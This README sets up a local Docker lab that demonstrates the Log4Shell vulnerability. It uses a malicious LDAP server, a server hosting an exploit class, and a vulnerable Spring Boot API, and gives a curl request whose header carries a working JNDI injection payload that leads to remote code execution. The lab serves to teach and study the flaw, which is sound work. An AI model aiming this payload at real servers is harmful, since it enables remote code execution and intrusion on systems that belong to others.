The git repo contains a docker compose file that will run the 3 containers called servers.yml
The 3 referenced Dockerfiles build and deploy the 3 containers. All 3 contain 2 stages, one to build the code and the second the deploy and run it.
This dockerfile sets up a malicious LDAP server. It firsts pulls from a git repo containing the code, and uses maven to build it.
https://github.com/mbechler/marshalsec.git
The second stage deploys the code. It contains a URL where it will redirect incoming requests to where the exploit is hosted "http://exploit-server:8888/#Exploit"
The build stage of this container uses javac to compile the exploit to a java class. It then hosts that file using a simple python webserver
The last container builds the spring boot API and then deploys it. The API will then use log4j to log details from incoming requests.
Throughout the code and readme you will see the below referenced in the URLs
- ldap-server
- exploit-server
- api-server
When using Docker you can refer to the services by their name in the docker-compose file rather than by IP
Install Docker https://docs.docker.com/desktop/windows/install/
git clone https://github.com/JOG-NTMK/log4shell-exploit.git
cd log4shell-exploit
docker-compose -f .\servers.yml build
docker-compose -f .\servers.yml up
There will then be output from docker showing the containers get built and deployed. Once its finished call the API
curl --location --request POST '127.0.0.1:8080/api' \
--header 'X-Api-Version: ${jndi:ldap://ldap-server:1389/Exploit}'
After calling the API there will be further output in the console. A lot of text will be outputted, most of it will be an exception. But that’s due to the exploit running. Before the exception output there will be 3 very interesting lines
log4shell-exploit-jndi-server-1 | Send LDAP reference result for Exploit redirecting to http://exploit-server:8888/Exploit.class
log4shell-exploit-exploit-server-1 | 172.20.0.4 - - [05/Mar/2022 14:24:39] "GET /Exploit.class HTTP/1.1" 200 -
log4shell-exploit-api-server-1 | You've been hacked!
When the HTTP header X-Api-Version was logged the value ${jndi:ldap://jndi-server:1389/Exploit} was parsed by log4j.
Java then performed a jndi ldap lookup to the passed address and port jndi-server:1389
The LDAP server then redirected the request to http://exploit-server:8888/Exploit.class
That server returned the Exploit.class file which was then executed by our API.
The line "You've been hacked!" is outputted by the exploit class. A file is also created in the tmp folder on the api container demonstrating that not only can java be executed but also shell access is possible.
The exception that follows is due to the requests not being an actual JNDI LDAP lookup